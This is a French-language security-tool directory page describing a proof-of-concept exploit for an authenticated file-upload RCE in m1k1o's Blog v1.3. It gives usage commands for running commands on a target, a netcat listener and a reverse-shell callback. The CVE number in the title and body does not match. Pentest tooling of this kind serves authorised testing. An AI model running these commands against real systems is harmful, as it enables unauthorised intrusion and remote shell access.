Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2022-23636-poc — Exploit d'exécution de code à distance authentifié pour m1k1o's Blog v1.3 via téléchargement de fichier non validé, avec déploiement de webshell et capacités de reverse shell. | Kitploit
Outils/GitHubGitHub/cyhe50/cve-2022-23636-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubcyhe50/cve-2022-23636-poc

cve-2022-23636-poc

Exploit d'exécution de code à distance authentifié pour m1k1o's Blog v1.3 via téléchargement de fichier non validé, avec déploiement de webshell et capacités de reverse shell.

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-23626 - Blog de m1k1o - RCE Authentifié

Exécution de code à distance authentifiée via une vulnérabilité de téléchargement de fichier dans m1k1o's Blog v1.3 et versions antérieures.

Description

Le point de terminaison ajax.php?action=upload_image ne valide pas correctement les types de fichiers téléchargés, permettant à un utilisateur authentifié de télécharger une webshell PHP déguisée en image. L'attaquant peut ensuite déclencher l'exécution en demandant directement le fichier téléchargé.

Références

  • EDB-50943
  • CVE-2022-23626
  • m1k1o/blog GitHub

Version affectée

  • m1k1o's Blog v1.3 et versions antérieures

Prérequis

  • Python 3
  • Bibliothèque requests
root@kitploit:~
pip install requests

Utilisation

Exécuter une commande

root@kitploit:~
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -c "id"

Shell inversé

Démarrez d'abord un écouteur :

root@kitploit:~
nc -lnvp 4444

Puis exécutez :

root@kitploit:~
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -lh 10.10.14.2 -lp 4444

Avertissement

Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. Utilisez-le uniquement sur des systèmes pour lesquels vous avez une autorisation explicite.

Télécharger l’outil